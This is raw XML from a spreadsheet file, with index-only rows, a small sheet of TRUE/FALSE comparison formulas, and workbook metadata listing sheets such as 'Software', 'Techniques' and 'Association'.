    <row r="395" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A395" t="s">
        <v>4783</v>
      </c>
    </row>
    <row r="396" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A396" t="s">
        <v>4788</v>
      </c>
    </row>
    <row r="397" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A397" t="s">
        <v>4793</v>
      </c>
    </row>
    <row r="398" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A398" t="s">
        <v>4799</v>
      </c>
    </row>
    <row r="399" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A399" t="s">
        <v>4804</v>
      </c>
    </row>
    <row r="400" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A400" t="s">
        <v>4809</v>
      </c>
    </row>
    <row r="401" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A401" t="s">
        <v>4813</v>
      </c>
    </row>
    <row r="402" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A402" t="s">
        <v>4817</v>
      </c>
    </row>
    <row r="403" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A403" t="s">
        <v>4822</v>
      </c>
    </row>
    <row r="404" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A404" t="s">
        <v>4827</v>
      </c>
    </row>
    <row r="405" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A405" t="s">
        <v>4833</v>
      </c>
    </row>
    <row r="406" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A406" t="s">
        <v>4839</v>
      </c>
    </row>
    <row r="407" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A407" t="s">
        <v>4844</v>
      </c>
    </row>
    <row r="408" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A408" t="s">
        <v>4849</v>
      </c>
    </row>
    <row r="409" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A409" t="s">
        <v>4854</v>
      </c>
    </row>
    <row r="410" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A410" t="s">
        <v>4860</v>
      </c>
    </row>
    <row r="411" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A411" t="s">
        <v>4866</v>
      </c>
    </row>
    <row r="412" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A412" t="s">
        <v>4873</v>
      </c>
    </row>
    <row r="413" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A413" t="s">
        <v>4878</v>
      </c>
    </row>
    <row r="414" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A414" t="s">
        <v>4884</v>
      </c>
    </row>
    <row r="415" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A415" t="s">
        <v>4890</v>
      </c>
    </row>
    <row r="416" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A416" t="s">
        <v>4896</v>
      </c>
    </row>
    <row r="417" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A417" t="s">
        <v>4902</v>
      </c>
    </row>
    <row r="418" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A418" t="s">
        <v>4908</v>
      </c>
    </row>
    <row r="419" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A419" t="s">
        <v>4914</v>
      </c>
    </row>
    <row r="420" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A420" t="s">
        <v>4919</v>
      </c>
    </row>
    <row r="421" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A421" t="s">
        <v>4925</v>
      </c>
    </row>
    <row r="422" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A422" t="s">
        <v>4932</v>
      </c>
    </row>
    <row r="423" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A423" t="s">
        <v>4939</v>
      </c>
    </row>
    <row r="424" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A424" t="s">
        <v>4946</v>
      </c>
    </row>
    <row r="425" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A425" t="s">
        <v>4952</v>
      </c>
    </row>
    <row r="426" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A426" t="s">
        <v>4959</v>
      </c>
    </row>
    <row r="427" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A427" t="s">
        <v>4967</v>
      </c>
    </row>
    <row r="428" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A428" t="s">
        <v>4974</v>
      </c>
    </row>
    <row r="429" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A429" t="s">
        <v>4981</v>
      </c>
    </row>
    <row r="430" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A430" t="s">
        <v>4987</v>
      </c>
    </row>
    <row r="431" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A431" t="s">
        <v>4992</v>
      </c>
    </row>
    <row r="432" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A432" t="s">
        <v>4996</v>
      </c>
    </row>
    <row r="433" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A433" t="s">
        <v>5002</v>
      </c>
    </row>
    <row r="434" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A434" t="s">
        <v>5008</v>
      </c>
    </row>
    <row r="435" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A435" t="s">
        <v>5013</v>
      </c>
    </row>
    <row r="436" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A436" t="s">
        <v>5018</v>
      </c>
    </row>
    <row r="437" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A437" t="s">
        <v>5022</v>
      </c>
    </row>
    <row r="438" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A438" t="s">
        <v>5026</v>
      </c>
    </row>
    <row r="439" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A439" t="s">
        <v>5030</v>
      </c>
    </row>
    <row r="440" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A440" t="s">
        <v>5034</v>
      </c>
    </row>
    <row r="441" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A441" t="s">
        <v>5038</v>
      </c>
    </row>
    <row r="442" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A442" t="s">
        <v>5042</v>
      </c>
    </row>
    <row r="443" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A443" t="s">
        <v>5046</v>
      </c>
    </row>
    <row r="444" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A444" t="s">
        <v>5050</v>
      </c>
    </row>
    <row r="445" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A445" t="s">
        <v>5054</v>
      </c>
    </row>
    <row r="446" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A446" t="s">
        <v>5058</v>
      </c>
    </row>
    <row r="447" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A447" t="s">
        <v>5062</v>
      </c>
    </row>
    <row r="448" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A448" t="s">
        <v>5066</v>
      </c>
    </row>
    <row r="449" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A449" t="s">
        <v>5071</v>
      </c>
    </row>
    <row r="450" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A450" t="s">
        <v>5077</v>
      </c>
    </row>
    <row r="451" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A451" t="s">
        <v>5084</v>
      </c>
    </row>
    <row r="452" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A452" t="s">
        <v>5091</v>
      </c>
    </row>
    <row r="453" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A453" t="s">
        <v>5097</v>
      </c>
    </row>
    <row r="454" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A454" t="s">
        <v>5104</v>
      </c>
    </row>
    <row r="455" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A455" t="s">
        <v>5109</v>
      </c>
    </row>
    <row r="456" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A456" t="s">
        <v>5118</v>
      </c>
    </row>
    <row r="457" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A457" t="s">
        <v>5125</v>
      </c>
    </row>
    <row r="458" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A458" t="s">
        <v>5132</v>
      </c>
    </row>
    <row r="459" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A459" t="s">
        <v>5138</v>
      </c>
    </row>
    <row r="460" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A460" t="s">
        <v>5144</v>
      </c>
    </row>
    <row r="461" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A461" t="s">
        <v>5151</v>
      </c>
    </row>
    <row r="462" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A462" t="s">
        <v>5158</v>
      </c>
    </row>
    <row r="463" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A463" t="s">
        <v>5164</v>
      </c>
    </row>
    <row r="464" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A464" t="s">
        <v>5170</v>
      </c>
    </row>
    <row r="465" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A465" t="s">
        <v>5175</v>
      </c>
    </row>
    <row r="466" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A466" t="s">
        <v>5181</v>
      </c>
    </row>
    <row r="467" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A467" t="s">
        <v>5187</v>
      </c>
    </row>
    <row r="468" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A468" t="s">
        <v>5193</v>
      </c>
    </row>
    <row r="469" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A469" t="s">
        <v>5198</v>
      </c>
    </row>
    <row r="470" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A470" t="s">
        <v>5207</v>
      </c>
    </row>
    <row r="471" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A471" t="s">
        <v>5214</v>
      </c>
    </row>
    <row r="472" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A472" t="s">
        <v>5219</v>
      </c>
    </row>
    <row r="473" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A473" t="s">
        <v>5224</v>
      </c>
    </row>
    <row r="474" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A474" t="s">
        <v>5229</v>
      </c>
    </row>
    <row r="475" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A475" t="s">
        <v>5234</v>
      </c>
    </row>
    <row r="476" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A476" t="s">
        <v>5239</v>
      </c>
    </row>
    <row r="477" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A477" t="s">
        <v>5245</v>
      </c>
    </row>
    <row r="478" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A478" t="s">
        <v>5250</v>
      </c>
    </row>
    <row r="479" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A479" t="s">
        <v>5257</v>
      </c>
    </row>
    <row r="480" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A480" t="s">
        <v>5265</v>
      </c>
    </row>
    <row r="481" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A481" t="s">
        <v>5272</v>
      </c>
    </row>
    <row r="482" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A482" t="s">
        <v>5279</v>
      </c>
    </row>
    <row r="483" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A483" t="s">
        <v>5285</v>
      </c>
    </row>
    <row r="484" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A484" t="s">
        <v>5290</v>
      </c>
    </row>
    <row r="485" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A485" t="s">
        <v>5296</v>
      </c>
    </row>
    <row r="486" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A486" t="s">
        <v>5303</v>
      </c>
    </row>
    <row r="487" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A487" t="s">
        <v>5308</v>
      </c>
    </row>
    <row r="488" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A488" t="s">
        <v>5315</v>
      </c>
    </row>
    <row r="489" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A489" t="s">
        <v>5321</v>
      </c>
    </row>
    <row r="490" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A490" t="s">
        <v>5328</v>
      </c>
    </row>
    <row r="491" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A491" t="s">
        <v>5334</v>
      </c>
    </row>
    <row r="492" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A492" t="s">
        <v>5342</v>
      </c>
    </row>
    <row r="493" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A493" t="s">
        <v>5348</v>
      </c>
    </row>
    <row r="494" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A494" t="s">
        <v>5353</v>
      </c>
    </row>
    <row r="495" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A495" t="s">
        <v>5358</v>
      </c>
    </row>
    <row r="496" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A496" t="s">
        <v>5362</v>
      </c>
    </row>
    <row r="497" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A497" t="s">
        <v>5368</v>
      </c>
    </row>
    <row r="498" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A498" t="s">
        <v>5374</v>
      </c>
    </row>
    <row r="499" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A499" t="s">
        <v>5378</v>
      </c>
    </row>
    <row r="500" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A500" t="s">
        <v>5383</v>
      </c>
    </row>
    <row r="501" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A501" t="s">
        <v>5387</v>
      </c>
    </row>
    <row r="502" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A502" t="s">
        <v>5391</v>
      </c>
    </row>
    <row r="503" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A503" t="s">
        <v>5396</v>
      </c>
    </row>
    <row r="504" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A504" t="s">
        <v>5402</v>
      </c>
    </row>
    <row r="505" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A505" t="s">
        <v>5408</v>
      </c>
    </row>
    <row r="506" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A506" t="s">
        <v>5414</v>
      </c>
    </row>
    <row r="507" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A507" t="s">
        <v>5421</v>
      </c>
    </row>
    <row r="508" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A508" t="s">
        <v>5427</v>
      </c>
    </row>
    <row r="509" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A509" t="s">
        <v>5434</v>
      </c>
    </row>
    <row r="510" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A510" t="s">
        <v>5442</v>
      </c>
    </row>
    <row r="511" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A511" t="s">
        <v>5450</v>
      </c>
    </row>
    <row r="512" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A512" t="s">
        <v>5455</v>
      </c>
    </row>
    <row r="513" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A513" t="s">
        <v>5461</v>
      </c>
    </row>
    <row r="514" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A514" t="s">
        <v>5467</v>
      </c>
    </row>
    <row r="515" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A515" t="s">
        <v>5473</v>
      </c>
    </row>
    <row r="516" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A516" t="s">
        <v>5480</v>
      </c>
    </row>
    <row r="517" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A517" t="s">
        <v>5485</v>
      </c>
    </row>
    <row r="518" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A518" t="s">
        <v>5491</v>
      </c>
    </row>
    <row r="519" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A519" t="s">
        <v>5497</v>
      </c>
    </row>
    <row r="520" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A520" t="s">
        <v>5503</v>
      </c>
    </row>
    <row r="521" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A521" t="s">
        <v>5510</v>
      </c>
    </row>
    <row r="522" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A522" t="s">
        <v>5516</v>
      </c>
    </row>
    <row r="523" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A523" t="s">
        <v>5522</v>
      </c>
    </row>
    <row r="524" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A524" t="s">
        <v>5527</v>
      </c>
    </row>
    <row r="525" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A525" t="s">
        <v>5532</v>
      </c>
    </row>
    <row r="526" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A526" t="s">
        <v>5537</v>
      </c>
    </row>
    <row r="527" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A527" t="s">
        <v>5546</v>
      </c>
    </row>
    <row r="528" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A528" t="s">
        <v>5553</v>
      </c>
    </row>
    <row r="529" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A529" t="s">
        <v>5560</v>
      </c>
    </row>
    <row r="530" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A530" t="s">
        <v>5566</v>
      </c>
    </row>
    <row r="531" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A531" t="s">
        <v>5572</v>
      </c>
    </row>
    <row r="532" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A532" t="s">
        <v>5579</v>
      </c>
    </row>
    <row r="533" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A533" t="s">
        <v>5585</v>
      </c>
    </row>
    <row r="534" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A534" t="s">
        <v>5592</v>
      </c>
    </row>
    <row r="535" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A535" t="s">
        <v>5598</v>
      </c>
    </row>
    <row r="536" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A536" t="s">
        <v>5606</v>
      </c>
    </row>
    <row r="537" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A537" t="s">
        <v>5611</v>
      </c>
    </row>
    <row r="538" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A538" t="s">
        <v>5617</v>
      </c>
    </row>
    <row r="539" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A539" t="s">
        <v>5622</v>
      </c>
    </row>
    <row r="540" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A540" t="s">
        <v>5627</v>
      </c>
    </row>
    <row r="541" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A541" t="s">
        <v>5632</v>
      </c>
    </row>
    <row r="542" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A542" t="s">
        <v>5640</v>
      </c>
    </row>
    <row r="543" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A543" t="s">
        <v>5647</v>
      </c>
    </row>
    <row r="544" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A544" t="s">
        <v>5652</v>
      </c>
    </row>
    <row r="545" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A545" t="s">
        <v>5657</v>
      </c>
    </row>
    <row r="546" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A546" t="s">
        <v>5663</v>
      </c>
    </row>
    <row r="547" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A547" t="s">
        <v>5668</v>
      </c>
    </row>
    <row r="548" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A548" t="s">
        <v>5673</v>
      </c>
    </row>
    <row r="549" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A549" t="s">
        <v>5678</v>
      </c>
    </row>
    <row r="550" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A550" t="s">
        <v>5682</v>
      </c>
    </row>
    <row r="551" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A551" t="s">
        <v>5687</v>
      </c>
    </row>
    <row r="552" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A552" t="s">
        <v>5692</v>
      </c>
    </row>
    <row r="553" spans="1:1" x14ac:dyDescent="0.2">
      <c r="A553" t="s">
        <v>5697</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95B77-D8CC-6D47-8F35-8C02F8DD994C}">
  <dimension ref="A1:I8"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="E2" sqref="E2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="16" x14ac:dyDescent="0.2"/>
  <sheetData>
    <row r="1" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A1" t="s">
        <v>11602</v>
      </c>
      <c r="B1" t="s">
        <v>11603</v>
      </c>
      <c r="D1" s="7"/>
      <c r="E1" s="7">
        <v>1</v>
      </c>
      <c r="F1" s="7">
        <v>2</v>
      </c>
      <c r="G1" s="7">
        <v>3</v>
      </c>
      <c r="H1" s="7">
        <v>4</v>
      </c>
      <c r="I1" s="7"/>
    </row>
    <row r="2" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A2" t="s">
        <v>11604</v>
      </c>
      <c r="B2">
        <v>1</v>
      </c>
      <c r="D2" s="7" t="s">
        <v>11604</v>
      </c>
      <c r="E2" s="7" t="str">
        <f>IF(AND(A2=D2, B2=E1),"TRUE", "FALSE")</f>
        <v>TRUE</v>
      </c>
      <c r="F2" s="7"/>
      <c r="G2" s="7"/>
      <c r="H2" s="7"/>
      <c r="I2" s="7"/>
    </row>
    <row r="3" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A3" t="s">
        <v>11604</v>
      </c>
      <c r="B3">
        <v>2</v>
      </c>
      <c r="D3" s="7" t="s">
        <v>11605</v>
      </c>
      <c r="E3" s="7" t="str">
        <f>IF(AND(A3=D3, B3=E2),"TRUE", "FALSE")</f>
        <v>FALSE</v>
      </c>
      <c r="F3" s="7"/>
      <c r="G3" s="7"/>
      <c r="H3" s="7"/>
      <c r="I3" s="7"/>
    </row>
    <row r="4" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A4" t="s">
        <v>11605</v>
      </c>
      <c r="B4">
        <v>4</v>
      </c>
      <c r="D4" s="7" t="s">
        <v>11606</v>
      </c>
      <c r="E4" s="7" t="str">
        <f t="shared" ref="E3:E4" si="0">IF(AND(A4=D4, B4=E3),"TRUE", "FALSE")</f>
        <v>FALSE</v>
      </c>
      <c r="F4" s="7"/>
      <c r="G4" s="7"/>
      <c r="H4" s="7"/>
      <c r="I4" s="7"/>
    </row>
    <row r="5" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A5" t="s">
        <v>11605</v>
      </c>
      <c r="B5">
        <v>3</v>
      </c>
      <c r="D5" s="7"/>
      <c r="E5" s="7"/>
      <c r="F5" s="7"/>
      <c r="G5" s="7"/>
      <c r="H5" s="7"/>
      <c r="I5" s="7"/>
    </row>
    <row r="6" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A6" t="s">
        <v>11606</v>
      </c>
      <c r="B6">
        <v>4</v>
      </c>
      <c r="D6" s="7"/>
      <c r="E6" s="7"/>
      <c r="F6" s="7"/>
      <c r="G6" s="7"/>
      <c r="H6" s="7"/>
      <c r="I6" s="7"/>
    </row>
    <row r="7" spans="1:9" x14ac:dyDescent="0.2">
      <c r="A7" t="s">
        <v>11606</v>
      </c>
      <c r="B7">
        <v>1</v>
      </c>
      <c r="D7" s="7"/>
      <c r="E7" s="7"/>
      <c r="F7" s="7"/>
      <c r="G7" s="7"/>
      <c r="H7" s="7"/>
      <c r="I7" s="7"/>
    </row>
    <row r="8" spans="1:9" x14ac:dyDescent="0.2">
      <c r="D8" s="7"/>
      <c r="E8" s="7"/>
      <c r="F8" s="7"/>
      <c r="G8" s="7"/>
      <c r="H8" s="7"/>
      <c r="I8" s="7"/>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Software</vt:lpstr>
      <vt:lpstr>Techniques</vt:lpstr>
      <vt:lpstr>Association</vt:lpstr>
      <vt:lpstr>Association_compact</vt:lpstr>
      <vt:lpstr>Vektordarstellung</vt:lpstr>
      <vt:lpstr>Test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2021-05-05T06:38:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-10T07:33:46Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>